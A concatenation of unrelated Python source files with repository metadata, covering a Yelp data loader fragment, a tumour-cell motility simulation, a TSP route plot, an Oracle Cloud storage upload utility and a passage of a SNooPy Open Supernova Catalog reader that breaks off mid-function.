return conn.execute(Business.select().where(Business.c.yelp_id ==
business['yelp_id'])).first()
def link_business_to_tags(business, tags, conn):
for tag in tags:
conn.execute(
business_tag_join_table.insert().values(tag_id=tag.id,
business_id=business.id))
def extract_business(business_dict, engine):
conn = engine.connect()
if business_exists(business_dict['id'], conn):
delete_business(business_dict['id'], conn)
business = parse_yelp_business(business_dict)
tags = get_or_create_tags(business_dict['categories'], conn)
business = create_business(business, conn)
link_business_to_tags(business, tags, conn)
logging.info('successfully processed business: {}'
.format(business_dict['id']))
| 0
| 0
| 0
| 0
| 0
| 1,706
| 0
| 37
| 161
|
5ddcfbd5c5a68beee52f20bf25f10cc164269d23
| 14,652
|
py
|
Python
|
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | 1
|
2020-12-03T15:47:24.000Z
|
2020-12-03T15:47:24.000Z
|
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
doubling_agent/motility_functions.py
|
lkmartin90/doubling_agent
|
73a7f06aa43c5fa51ea1263b72ebe6f8319bf894
|
[
"MIT"
] | null | null | null |
###
# Broadly the same as "basic_functions.py" but updated to include motility
# intentionally trying to keep them separate so as not to slow down the basic version
###
| 36.35732
| 115
| 0.574597
|
from random import random
from random import choice
import numpy as np
import plotly.express as px
import struct
import operator
###
# Broadly the same as "basic_functions.py" but updated to include motility
# intentionally trying to keep them separate so as not to slow down the basic version
###
class MotilityParameters:
def __init__(self, switch_to_m_rate, switch_to_p_rate, motility_rate):
# 0 motility state is proliferating, 1 is moving
self.m = switch_to_m_rate
self.p = switch_to_p_rate
self.rate = motility_rate
self.dict = {0: switch_to_m_rate, 1: switch_to_p_rate + motility_rate}
class ParametersBasic:
def __init__(self, s_division_rate, epsilon, p_division_rate, apoptosis_rate):
self.s = s_division_rate
self.p = p_division_rate
self.e = epsilon
self.a = apoptosis_rate
self.dict = {0: s_division_rate, 1: p_division_rate, 2: apoptosis_rate}
self.death = {0: 0, 1: 0, 2: apoptosis_rate}
class ParametersQuiescent:
def __init__(self, k1, k2, k3, k4, k5, k6, k7, k8):
# s>s+s :k1, s>s+p:k2, s>dead:k3, p>p+p:k4, p>dead:k5, p>Q:k6, D>dead:k7, Q>s:k8
self.k1 = k1
self.k2 = k2
self.k3 = k3
self.k4 = k4
self.k5 = k5
self.k6 = k6
self.k7 = k7
self.k8 = k8
# rate of something happening for each state
# note the slight change in notation, 0 is stem cell, 1 progenitor, 2 differentiated and 3 quiescent
self.dict = {0: k1+k2+k3, 1: k4+k5+k6, 2: k7, 3: k8}
self.death = {0: k3, 1: k5, 2: k7, 3: 0}
def cancer_seed_single(cells, switch_3d):
# created initial cancer stem cell at [0,0]
if switch_3d:
cells.update({(0, 0, 0): [0, 0, 0]})
else:
cells.update({(0,0): [0, 0, 0]})
def cancer_seed_single_quiescent(cells):
# created initial cancer cell (differentiated) at [0,0]
cells.update({(0,0): [3, 0, 0]})
def cancer_seed_single_progen(cells):
# created initial cancer cell (differentiated) at [0,0]
cells.update({(0,0): [1, 0, 0]})
def timing_update_all(cells, params, mot_params):
# update second entry in dict to give a timing based on the first entry, the state
# time is log(1/rand_no)/rate
# Now want to account for fact that cells can either change motility state or move or divide
# options:
# motility state 1: can either move, change motility state, or die
# motility state 0: can either change motility state or go though all division choices
# including death (already written)
for k in cells.keys():
state = cells.get(k)[0]
mot = cells.get(k)[2]
div = params.dict[state] # division or death rate for motility 0
m_or_c = mot_params.dict[mot] # move or change rate
mot_death = params.death[state] # death rate for motility state 1
if mot == 0:
rate = div+m_or_c
else:
rate = m_or_c + mot_death
cells.update({k: [state, np.log(1/random())/rate, mot]})
def choose_new_pos(pos, cells):
# Identifies a free position for a cell to divide or move into. In this function a 2d square grid is used
# space is searched for in the surrounding area, by random number generator, if there is already a cell
# occupying the space then that space is excluded from possible locations and a new random number is generated.
i = pos[0]
j = pos[1]
neighbours = [(i+1, j), (i-1, j), (i, j-1), (i, j+1)]
options = [0, 1, 2, 3]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def choose_new_pos_eq(pos, cells):
# choses a new position by identifying all the free spaces first and then assigning them all equal probability
i = pos[0]
j = pos[1]
neighbours = [(i+1, j), (i-1, j), (i, j-1), (i, j+1)]
options = [0, 1, 2, 3]
for n in range(len(neighbours)):
if neighbours[n] in cells:
options.remove(n)
if len(options) > 0:
new_pos = neighbours[choice(options)]
else:
new_pos = 0
return new_pos
def choose_new_pos_3d(pos, cells):
# 3d version of "choose_new_pos", the same method is used
i = pos[0]
j = pos[1]
k = pos[2]
# this currently assumes only square transitions on the cubic grid, may want to alter
neighbours = [(i + 1, j, k), (i - 1, j, k), (i, j + 1, k), (i, j - 1, k), (i, j, k + 1), (i, j, k - 1)]
options = [0, 1, 2, 3, 4, 5]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def choose_new_pos_3d_eq(pos, cells):
# 3d version of "choose_new_pos", the same method is used
i = pos[0]
j = pos[1]
k = pos[2]
# this currently assumes only square transitions on the cubic grid, may want to alter
neighbours = [(i + 1, j, k), (i - 1, j, k), (i, j + 1, k), (i, j - 1, k), (i, j, k + 1), (i, j, k - 1)]
options = [0, 1, 2, 3, 4, 5]
cont = 0
new_pos = 0
while cont == 0 and len(options) > 0:
pick = choice(options)
check = neighbours[pick]
if check in cells:
options.remove(pick)
else:
cont = 1
new_pos = check
return new_pos
def move_cell(cells, pos, state, switch_3d):
# moves the cell
if switch_3d:
new_location = choose_new_pos_3d(pos, cells)
else:
new_location = choose_new_pos(pos, cells)
if new_location != 0:
del cells[pos]
cells.update({new_location: [state, 0, 1]})
def update_cell_basic(cells, pos, params, switch_3d, mot_params):
# updates a given cell based on the current state of that cell
# pos is string describing position
# time is from random number generator giving time of interaction
# cells is dict describing all cells in the tumour
state = cells.get(pos)[0]
mot = cells.get(pos)[2]
# Once motility is included first thing is to make a decision on whether the cell moves, divides, or switches
# to a different motility state. Need to check that an appropriate time step is being used still.
mot_check = random()
if mot == 1:
# Can move, cell can either switch motility state or move or die
if mot_check < mot_params.p/(mot_params.dict.get(mot) + params.death.get(state)):
# then the motilty state changes
cells.update({pos: [state, 0, abs(mot-1)]})
elif mot_check < mot_params.dict.get(mot)/(mot_params.dict.get(mot) + params.death.get(state)):
# The cell moves
move_cell(cells, pos, state, switch_3d)
else:
# cell death
del cells[pos]
else:
# No motility, can either switch state or go to division decisions
if mot_check < mot_params.m/(mot_params.dict.get(mot) + params.dict.get(state)):
# then the motilty state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
# The cell divides or dies, can ust move on to that section as we have already conditioned on the
# probability of it happening
else:
if switch_3d:
daughter = choose_new_pos_3d(pos, cells)
else:
daughter = choose_new_pos(pos, cells)
if state == 0:
# if it's a stem cell there are 2 possibilities, S > S + S, S > S + P
# generate random number to determine fate, compare to epsilon
r_num = random()
if r_num < params.e:
# divide > S + S
if daughter != 0:
cells.update({daughter: [0, 0, 0]})
else:
# divide > S + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
elif state == 1:
# if it's a progentior cell there are 2 possibilities, P > P + P, P > D
# generate random number to determine fate, start by assuming each happens with equal chance
r_num = random()
if r_num < 0.5:
# P > P + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
else:
# P > D
cells.update({pos: [2, 0, 0]})
else:
# If it is differentiated cell the only possible state change is death
del cells[pos]
def update_cell_quiescent(cells, pos, params, switch_3d, mot_params):
# updates a given cell based on the current state of that cell
# pos is string describing position
# time is from random number generator giving time of interaction
# cells is dict describing all cells in the tumour
state = cells.get(pos)[0]
mot = cells.get(pos)[2]
# Once motility is included first thing is to make a decision on whether the cell moves, divides, or switches
# to a different motility state. Need to check that an appropriate time step is being used still.
mot_check = random()
if mot == 1:
# Can move, cell can either switch motility state or move or die
if mot_check < mot_params.p / (mot_params.dict.get(mot) + params.death.get(state)):
# then the motilty state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
elif mot_check < mot_params.dict.get(mot) / (mot_params.dict.get(mot) + params.death.get(state)):
# The cell moves
move_cell(cells, pos, state, switch_3d)
else:
# cell death
del cells[pos]
else:
# No motility, can either switch state or go to division decisions
if mot_check < mot_params.m / (mot_params.dict.get(mot) + params.dict.get(state)):
# then the motilty state changes
cells.update({pos: [state, 0, abs(mot - 1)]})
else:
if switch_3d:
daughter = choose_new_pos_3d(pos, cells)
else:
daughter = choose_new_pos(pos, cells)
if state == 0:
# if it's a stem cell there are 3 possibilities, S > S + S, S > S + P and S > dead
# generate random number to determine fate
r_num = random()
if r_num < params.k1/params.dict.get(0):
# divide > S + S
if daughter != 0:
cells.update({daughter: [0, 0, 0]})
elif r_num < (params.k1+params.k2)/params.dict.get(0):
# divide > S + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
else:
# die
del cells[pos]
elif state == 1:
# if it's a progentior cell there are 3 possibilities, P > P + P, P > D, P > Q
# generate random number to determine fate
r_num = random()
if r_num < params.k4/params.dict.get(1):
# P > P + P
if daughter != 0:
cells.update({daughter: [1, 0, 0]})
elif r_num < (params.k4+params.k5)/params.dict.get(1):
# P > D
cells.update({pos: [2, 0, 0]})
else:
# P > Q
cells.update({pos: [3, 0, 0]})
elif state == 2:
# If it is differentiated cell the only possible state change is death
del cells[pos]
else:
# If its Quiescent the only possible fate is to return to a stem cell
cells.update({pos: [0, 0, 0]})
def animate(animation_df, r, name):
# animate the simulations using plotly and save as a .html
animation_df['coord'] = animation_df[['x', 'y']].values.tolist()
animation_df['coord'] = animation_df['coord'].apply(lambda x: np.array(x))
#print(animation_df)
if len(animation_df['coord'].values[0]) > 2:
print("currently cannot animate for 3d")
raise ValueError()
mapping = {0: 'stem cell', 1: 'progenitor cell', 2: 'differentiated cell', 3: 'quiescent cell'}
animation_df = animation_df.replace({'state': mapping})
animation_df = animation_df.append(
{'state': 'differentiated cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
animation_df = animation_df.append(
{'state': 'progenitor cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
animation_df = animation_df.append(
{'state': 'quiescent cell', 'count': 0, 'coord': 0, 'x': 10000, 'y': 10000},
ignore_index=True)
fig = px.scatter(animation_df, x="x", y="y", animation_frame="count",
color='state', size_max=55, range_x=[-50, 50], range_y=[-50, 50])
fig.update_traces(marker=dict(size=12))
fig.layout.updatemenus[0].buttons[0].args[1]["frame"]["duration"] = 20
fig.show()
fig.write_html(name + '/ani_' + str(r) + '.html')
def read_from_file(file_name, switch_3d):
# read data from binary file in the form: time step, x, y, state, motility
if switch_3d:
struct_fmt = '=iiiiii' # 6 ints
else:
struct_fmt = '=iiiii' # 5 ints
struct_len = struct.calcsize(struct_fmt)
struct_unpack = struct.Struct(struct_fmt).unpack_from
results = []
with open(file_name, "rb") as f:
while True:
data = f.read(struct_len)
if not data: break
s = struct_unpack(data)
results.append(s)
return results
def calculate_timestep(params, mot_params):
# calculates timestep based on the probability of 2 or more events happening in a timestep (<0.01)
max_rate = max(params.dict.items(), key=operator.itemgetter(1))[1] + \
max(mot_params.dict.items(), key=operator.itemgetter(1))[1]
# playing it safe by summing max of each
lambert = 0.135157
step = lambert/max_rate
print('exact timestep from calculation', step)
if step > 0.1:
return step // 0.1 * 0.1
elif step > 0.01:
return step // 0.01 * 0.01
else:
return step // 0.001 * 0.001
| 0
| 0
| 0
| 1,247
| 0
| 12,698
| 0
| -3
| 523
|
7c713c20032eec8a8f8dbf77f8cd9a9bca904c31
| 1,454
|
py
|
Python
|
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | 1
|
2020-12-10T17:36:39.000Z
|
2020-12-10T17:36:39.000Z
|
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | null | null | null |
TSP.py
|
ccfelius/TravelingSalesMan
|
ebc3b960859590623c0eb301545cd093c41d157a
|
[
"MIT"
] | 1
|
2021-01-05T13:08:07.000Z
|
2021-01-05T13:08:07.000Z
|
""" TSP SIMULATED ANNEALING """
# Imports
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# read data from file
filename = "eil51.tsp"
f = open(f"TSP-configurations/{filename}.txt", "r")
network = f.readlines()[6:-1]
# create dictionary to store coordinates
nodes = dict()
# split data and put in dict
for node in network:
node = [int(x) for x in node.rstrip().split(' ')]
nodes[node[0]] = node[1:]
x = [x[0] for x in nodes.values()]
y = [y[1] for y in nodes.values()]
# load in data of optimal path
data = pd.read_csv("data/eil51.tsp.tsp-batch-20.txt", sep="\t")
colname = "428.87"
z = list(map(float,list(data[f'{colname}-19'])))
# optimum so far (costs = 428.87175639203394)
# r= [1.0, 32, 11, 38, 5, 37, 17, 4, 18, 47, 12, 46, 51.0, 27, 6, 48, 23, 7, 43, 24, 14, 25, 13, 41, 40, 19, 42, 44, 15, 45, 33, 39, 10, 49, 9, 30, 34, 21, 50, 16, 2, 29, 20, 35, 36, 3, 28, 31, 26, 8, 22, 1.0]
temp = []
# get coordinates of each point
for item in z:
temp.append(nodes[item])
temp = np.array(temp)
# path = [temp[i:i+2] for i in range(len(temp)-2+1)]
# print(path)
# Plot the nodes and coordinates
fig, ax = plt.subplots()
ax.scatter(x, y, color="deeppink")
for i, txt in enumerate(nodes.keys()):
ax.annotate(txt, (x[i], y[i]))
ax.plot(*temp.T, color="deeppink", alpha=0.5)
ax.set_title(f"Shortest Route: {filename}, costs: {colname}", fontsize=16)
#
plt.savefig("plots/eil51-opt-route-3.png")
plt.show()
| 25.508772
| 209
| 0.636176
|
""" TSP SIMULATED ANNEALING """
# Imports
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
# read data from file
filename = "eil51.tsp"
f = open(f"TSP-configurations/{filename}.txt", "r")
network = f.readlines()[6:-1]
# create dictionary to store coordinates
nodes = dict()
# split data and put in dict
for node in network:
node = [int(x) for x in node.rstrip().split(' ')]
nodes[node[0]] = node[1:]
x = [x[0] for x in nodes.values()]
y = [y[1] for y in nodes.values()]
# load in data of optimal path
data = pd.read_csv("data/eil51.tsp.tsp-batch-20.txt", sep="\t")
colname = "428.87"
z = list(map(float,list(data[f'{colname}-19'])))
# optimum so far (costs = 428.87175639203394)
# r= [1.0, 32, 11, 38, 5, 37, 17, 4, 18, 47, 12, 46, 51.0, 27, 6, 48, 23, 7, 43, 24, 14, 25, 13, 41, 40, 19, 42, 44, 15, 45, 33, 39, 10, 49, 9, 30, 34, 21, 50, 16, 2, 29, 20, 35, 36, 3, 28, 31, 26, 8, 22, 1.0]
temp = []
# get coordinates of each point
for item in z:
temp.append(nodes[item])
temp = np.array(temp)
# path = [temp[i:i+2] for i in range(len(temp)-2+1)]
# print(path)
# Plot the nodes and coordinates
fig, ax = plt.subplots()
ax.scatter(x, y, color="deeppink")
for i, txt in enumerate(nodes.keys()):
ax.annotate(txt, (x[i], y[i]))
ax.plot(*temp.T, color="deeppink", alpha=0.5)
ax.set_title(f"Shortest Route: {filename}, costs: {colname}", fontsize=16)
#
plt.savefig("plots/eil51-opt-route-3.png")
plt.show()
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
35b4a123604f3ad39f518c8cd7cd58c05193a395
| 7,579
|
py
|
Python
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 28
|
2016-11-07T14:03:25.000Z
|
2022-02-01T08:46:52.000Z
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 3
|
2016-11-09T13:23:03.000Z
|
2018-04-05T15:49:22.000Z
|
common-python/rest_wrappers/oc/oc/upload_storage_object.py
|
LaudateCorpus1/atg-commerce-iaas
|
f1ae31657fc0111a5c019d46a28a3c81aae1acb2
|
[
"MIT"
] | 13
|
2016-10-27T17:59:38.000Z
|
2022-02-18T04:38:38.000Z
|
#!/usr/bin/python
# Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = "Andrew Hopkinson (Oracle Cloud Solutions A-Team)"
__copyright__ = "Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved."
__ekitversion__ = "@VERSION@"
__ekitrelease__ = "@RELEASE@"
__version__ = "1.0.0.0"
__date__ = "@BUILDDATE@"
__status__ = "Development"
__module__ = "upload_storage_object"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import sys
# Import utility methods
# Define methods
# Read Module Arguments
# Main processing function
# Main function to kick off processing
if __name__ == "__main__":
main(sys.argv[1:])
| 35.919431
| 197
| 0.613933
|
#!/usr/bin/python
# Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved.
"""Provide Module Description
"""
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
__author__ = "Andrew Hopkinson (Oracle Cloud Solutions A-Team)"
__copyright__ = "Copyright (c) 2013, 2014-2017 Oracle and/or its affiliates. All rights reserved."
__ekitversion__ = "@VERSION@"
__ekitrelease__ = "@RELEASE@"
__version__ = "1.0.0.0"
__date__ = "@BUILDDATE@"
__status__ = "Development"
__module__ = "upload_storage_object"
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#
import datetime
import getopt
import hashlib
import json
import locale
import logging
import multiprocessing
import operator
import os
import requests
import shutil
import subprocess
import sys
import tempfile
from contextlib import closing
# Import utility methods
from oscsutils import callRESTApi
from oscsutils import getPassword
from oscsutils import printJSON
from authenticate_oscs import authenticate
from oc_exceptions import REST401Exception
# Define methods
def md5(fname, readbuf=104857600, **kwargs):
hash_md5 = hashlib.md5()
cnt = 1
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(readbuf), b""):
hash_md5.update(chunk)
#print('Chunk: '+str(cnt))
cnt +=1
return hash_md5.hexdigest()
def getsplitprefix(filename):
return os.path.split(filename)[-1] + '-'
def getsplitdir(filename):
return filename + '.split'
def splitfile(filename, size='5GB', **kwargs):
files = []
if filename is not None:
splitdir = getsplitdir(filename)
os.makedirs(splitdir)
prefix = os.path.join(splitdir, getsplitprefix(filename))
cmd = ['split', '-b', size, filename, prefix]
cmdEnv = dict(os.environ)
outputLines = []
with closing(tempfile.TemporaryFile()) as fout:
try:
outputLines = subprocess.check_output(cmd, env=cmdEnv, stderr=fout).splitlines()
except subprocess.CalledProcessError as e:
fout.flush()
fout.seek(0)
print(fout.read())
print('\n'.join(outputLines))
raise e
return [os.path.join(splitdir, fn) for fn in os.listdir(splitdir)]
def uploadfile((endpoint, basepath, authtoken, filename, authendpoint, user, password, headers, params)):
print('Uploading : ' + filename)
files = None
resourcename = os.path.split(filename)[-1]
try:
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
except REST401Exception as e:
# Reauthenticate and retry
if authendpoint is not None and user is not None and password is not None:
authtoken, endpoint = authenticate(authendpoint, user, password)
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
else:
raise
print('Uploaded : ' + filename)
return
def uploadStorageObject(endpoint, container='compute_images', authtoken=None, filename=None, splitsize=4000, poolsize=4, authendpoint=None, user=None, password=None, extractarchive=None, **kwargs):
basepath = container
imgbasepath = basepath
splitbasepath = basepath + '_segments'
headers = None
params = None
if extractarchive is not None:
if params is None:
params = {}
params['extract-archive'] = extractarchive
data = None
files = None
jsonResponse = ''
if filename is not None and os.path.exists(filename):
#md5hash = md5(filename)
filesize = os.path.getsize(filename)
filesize /= (1024 * 1024)
if filesize > splitsize:
print('Splitting : ' + filename)
filelist = splitfile(filename, str(splitsize) + 'MB')
print('Into ' + str(len(filelist)) + ' segments')
basepath = splitbasepath + '/' + os.path.split(filename)[-1] + '/_segment_'
pool = multiprocessing.Pool(poolsize)
# Build tupal list
workerdata = []
for fn in filelist:
workerdata.append([endpoint, basepath, authtoken, fn, authendpoint, user, password, headers, params])
#print(workerdata)
# Start processes
pool.map(uploadfile, workerdata)
# Upload manifest file to point to parts
manifest = basepath + '/' + getsplitprefix(filename)
resourcename = os.path.split(filename)[-1]
headers = {'Content-Length': "0", 'X-Object-Manifest': manifest}
printJSON(headers)
data = None
basepath = imgbasepath
try:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=data, files=files)
except REST401Exception as e:
# Reauthenticate and retry
if authendpoint is not None and user is not None and password is not None:
authtoken, endpoint = authenticate(authendpoint, user, password)
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=data, files=files)
else:
raise
# Remove splitfiles
splitdir = getsplitdir(filename)
shutil.rmtree(splitdir)
else:
# Simple single file upload
basepath = imgbasepath
# Upload file
print('Uploading : ' + filename)
resourcename = os.path.split(filename)[-1]
with closing(open(filename, 'rb')) as f:
response = callRESTApi(endpoint, basepath, resourcename, method='PUT', authtoken=authtoken, headers=headers, params=params, data=f, files=files)
print('Uploaded : ' + filename)
jsonResponse = response.text
return jsonResponse
# Read Module Arguments
def readModuleArgs(opts, args):
moduleArgs = {}
moduleArgs['endpoint'] = None
moduleArgs['user'] = None
moduleArgs['password'] = None
moduleArgs['pwdfile'] = None
# Read Module Command Line Arguments.
for opt, arg in opts:
if opt in ("-e", "--endpoint"):
moduleArgs['endpoint'] = arg
elif opt in ("-u", "--user"):
moduleArgs['user'] = arg
elif opt in ("-p", "--password"):
moduleArgs['password'] = arg
elif opt in ("-P", "--pwdfile"):
moduleArgs['pwdfile'] = arg
return moduleArgs
# Main processing function
def main(argv):
# Configure Parameters and Options
options = 'e:u:p:P:'
longOptions = ['endpoint=', 'user=', 'password=', 'pwdfile=']
# Get Options & Arguments
try:
opts, args = getopt.getopt(argv, options, longOptions)
# Read Module Arguments
moduleArgs = readModuleArgs(opts, args)
except getopt.GetoptError:
usage()
except Exception as e:
print('Unknown Exception please check log file')
logging.exception(e)
sys.exit(1)
return
# Main function to kick off processing
if __name__ == "__main__":
main(sys.argv[1:])
| 0
| 0
| 0
| 0
| 0
| 6,118
| 0
| -2
| 601
|
70aa394b1e7534f0761f177159418f6363ceeb78
| 14,891
|
py
|
Python
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 6
|
2019-01-14T19:40:45.000Z
|
2021-06-05T12:19:39.000Z
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 3
|
2017-04-25T20:06:22.000Z
|
2021-06-09T20:46:41.000Z
|
snpy/get_osc.py
|
emirkmo/snpy
|
2a0153c84477ba8a30310d7dbca3d5a8f24de3c6
|
[
"MIT"
] | 8
|
2017-04-25T19:57:57.000Z
|
2021-11-12T11:54:19.000Z
|
'''
Module for SNooPy to download/parse data from the Open Supernova Catalog.
'''
from __future__ import print_function
import six
import json
if six.PY3:
import urllib.request as urllib
else:
import urllib
from astropy.coordinates import Angle
from snpy import sn, lc, fset
from numpy import array, log10
import astropy.units as u
from snpy.filters import spectrum
from snpy.specobj import timespec
# Some well-known publications and their mappings:
pubs = {
'1999AJ....117..707R': # Riess et al. (1999) Standard Photometry
CfAbands,
'2006AJ....131..527J': # Jha et al. (2006) Standard Photometry
CfAbands,
'2009ApJ...700..331H': # Hicken et al. (2009) CfA3 Natural Photometry
CfAbands,
'2012ApJS..200...12H': # Hicken et al. (2012) CfA4 Natural Photometry
CfAbands
}
# telescope,band --> SNooPy filter database
# We do this by matching (band,system,telescope,observatory) info from the
# database to SNooPy filters.
ftrans = {}
ftrans_standard = {}
standard_warnings = {}
for band in ['u','g','r','i','B','V','Y','J','H','K']:
ftrans[(band,"CSP",'',"LCO")] = band
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait2','')] = band+'kait'
for band in ['U','B','V','R','I']:
ftrans[(band,'','kait3','')] = band+'kait'
for band in ['J','H','Ks']:
ftrans[(band,'','PAIRITEL','')] = band+'2m'
for band in ['B','V','R','I']:
ftrans[(band,'','kait4', '')] = band+'kait'
for band in ['U','V','B']:
ftrans[(band, 'Vega','Swift','')] = band+"_UVOT"
for band in ['UVW1','UVW2','UVM2']:
ftrans[(band, 'Vega','Swift','')] = band
for band in ['g','r','i','z']:
ftrans[(band, '', 'PS1','')] = "ps1_"+band
# These are for data in (what I'm assuming) would be standard filters.
# We will issue a warning, though.
for band in ['U','B','V','R','I']:
ftrans_standard[(band,'','','')] = band+"s"
standard_warnings[band] = "Johnson/Kron/Cousins "
for band in ['u','g','r','i','z']:
ftrans_standard[(band,'','','')] = band+"_40"
standard_warnings[band] = "Sloan (APO) "
for band in ["u'","g'","r'","i'","z'"]:
ftrans_standard[(band,'','','')] = band[0]+"_40"
standard_warnings[band] = "Sloan (USNO-40) "
for band in ["J","H","Ks"]:
ftrans_standard[(band[0],'','','')] = band+"2m"
standard_warnings[band[0]] = "2MASS "
# Our own photometric systems:
def CSP_systems(filt, MJD):
'''Given a filter name and MJD date, output the correct telescope and
system information.'''
if filt == "V":
if MJD < 53748.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3014',
zeropoint="{:.4f}".format(fset['V0'].zp)))
elif MJD < 53759.0:
return (dict(telescope='Swope',instrument='Site2',band='V-3009',
zeropoint="{:.4f}".format(fset['V1'].zp)))
elif MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band='V-9844',
zeropoint="{:.4f}".format(fset['V'].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band='V-9844',
zeropoint="{:.4f}".format(fset['V2'].zp)))
if filt == "Jrc2":
return (dict(telescope='Swope',instrument='RetroCam',band='J',
zeropoint="{:.4f}".format(fset[filt].zp)))
if filt in ['u','g','r','i','B']:
if MJD < 56566.0:
return (dict(telescope='Swope',instrument='Site2',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='Swope',instrument='e2v',band=filt,
zeropoint="{:.4f}".format(fset[filt+'2'].zp)))
if filt in ['Y','J','H']:
if MJD < 55743.0:
return (dict(telescope='Swope',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt].zp)))
else:
return (dict(telescope='DuPont',instrument='RetroCam',band=filt,
zeropoint="{:.4f}".format(fset[filt+'d'].zp)))
return({})
MJD_offsets = {
'MJD':0,
'JD':-2400000.5
}
warning_message = {
'upperlims_noerr':'Warning: Data lacking errorbars or with upper-limits not imported',
'upperlims':'Warning: Data with upper-limits not imported',
}
OSC_template = '''https://sne.space/astrocats/astrocats/supernovae/output/json/{}.json'''
def get_obj(url, full_data=True, allow_no_errors=False, missing_error=0.01):
'''Attempt to build a SNooPy object from a Open Supernova Catalog server
URL.'''
if url.find('osc:') == 0:
# Try to construct a url based only on a name.
url = OSC_template.format(url.split(':')[1])
try:
uf = urllib.urlopen(url)
except:
return None,"Invalid URL"
try:
d = json.load(uf)
except:
uf.close()
if full_data:
return None,"Failed to decode JSON",None
return None,"Failed to decode JSON"
else:
uf.close()
# We now have the JSON data. Get the info we need
d = list(d.values())[0]
name = d['name']
if 'redshift' not in d or 'ra' not in d or 'dec' not in d:
return None,"No redshift, RA, or DEC found"
zhel = float(d['redshift'][0]['value'])
ra = Angle(" ".join([d['ra'][0]['value'],d['ra'][0]['u_value']])).degree
decl = Angle(" ".join([d['dec'][0]['value'],d['dec'][0]['u_value']])).degree
snobj = sn(name, ra=ra, dec=decl, z=zhel)
# All primary sources
all_sources_dict = [item for item in d['sources'] \
if not item.get('secondary',False)]
all_sources_dict2 = [item for item in d['sources'] \
if item.get('secondary',False)]
all_sources = {}
for source in all_sources_dict:
all_sources[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
all_sources2 = {}
for source in all_sources_dict2:
all_sources2[source['alias']] = (source.get('bibcode',''),
source.get('reference',''))
# Next, the photometry.
used_sources = []
MJD = {}
mags = {}
emags = {}
sids = {}
known_unknowns = []
unknown_unknowns = []
warnings = []
photometry = d.get('photometry', [])
for p in photometry:
if p.get('upperlimit',False):
continue
t = (p.get('band',''),p.get('system',''),p.get('telescope',''),
p.get('observatory',''))
# Deal with source of photometry
ss = p.get('source').split(',')
this_source = None
for s in ss:
if s in all_sources:
this_source = all_sources[s]
break
if this_source is None:
for s in ss:
if s in all_sources2:
this_source = all_sources2[s]
if this_source is None:
print("Warning: no primary source, skipping")
continue
bibcode = this_source[0]
if bibcode in pubs:
b = pubs[bibcode](t[0],float(p['time']))
elif t in ftrans:
b = ftrans[t]
